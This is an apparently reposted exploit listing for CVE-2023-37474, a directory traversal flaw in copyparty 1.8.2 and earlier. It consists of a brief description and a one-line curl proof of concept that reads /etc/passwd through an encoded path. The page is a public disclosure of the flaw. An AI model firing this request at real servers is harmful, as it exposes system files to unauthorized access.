Home Tools Exploits & CVE's Copyparty 1.8.2 Directory Traversal

Copyparty 1.8.2 Directory Traversal

August 1, 2023

233

Copyparty version 1.8.2 suffers from a directory traversal vulnerability.

advisories | CVE-2023-37474

# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474




#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.

#POC
curl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

Copyparty 1.8.2 Directory Traversal

Follow us on Instagram @thecyberpost

EDITOR PICKS

Early Bitcoin Investor Roger Ver Arrested for Tax Fraud

Carmakers lying about requiring warrants before sharing location data, Senate probe...

FBI searched Section 702 database half as much in 2023, Biden...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

XNU Kernel mach_msg Use-After-Free

Selea Targa IP OCR-ANPR Camera Stream Disclosure

Trojan-Dropper.Win32.Krepper.a Remote Command Execution